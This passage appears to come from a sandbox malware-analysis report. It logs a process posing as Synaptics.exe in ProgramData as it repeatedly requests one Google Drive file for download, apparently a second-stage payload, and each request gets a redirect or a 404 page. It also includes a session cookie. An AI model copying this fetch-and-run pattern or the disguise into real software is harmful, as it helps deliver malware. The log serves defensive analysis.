                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bkiRd-8iw6BvN8uw5T2ebg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:45 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:45 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 70 67 76 6b 56 66 33 7a 46 62 30 4c 4e 79 79 6e 68 58 38 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="QpgvkVf3zFb0LNyynhX8mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:45 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            123192.168.2.849896142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:45 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7Mdk3JnpnMJ-sq7WyUAvEmOw6i-hDql2XfBN1krJKJX8dnPjuSASnXkis0zEsE9tr7
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pOTNL-hQHg-bAvYH2UaBkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:45 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:45 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 54 4d 75 46 79 43 49 79 78 64 4f 72 67 77 68 38 48 73 4f 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="VTMuFyCIyxdOrgwh8HsObw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:45 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            124192.168.2.849899142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-E3-Z-rLjIpfmyKkaFtTvnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            125192.168.2.849901142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:46 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5-GJyMa3vimJ8-b3VX4FV45gQPdOyrdHt9hZoihy7d7AmNkdjiq9Iee3Z_DHJTA2OYr_fm-eA
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-g3TMxp-Uidph3MTS-EuwIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:46 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:46 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 35 31 54 42 54 71 76 67 76 4b 6c 7a 6c 63 74 66 65 68 46 71 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="M51TBTqvgvKlzlctfehFqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:46 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            126192.168.2.849900142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-b76RwzUTejLQWQhn0bWkEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            127192.168.2.849902142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC58NE_J6-gh5CXVU6EQJUBBe_Rv21O0ADXUiVNq_X4SdrMVCUx85NwZBAswMrwewlog
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:46 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-FamdA6oRxriUznRJjhQRSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 7a 35 66 65 67 73 77 57 32 7a 76 72 49 5a 39 4f 52 59 6d 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="Iz5fegswW2zvrIZ9ORYmGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            128192.168.2.849905142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            129192.168.2.849906142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:47 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
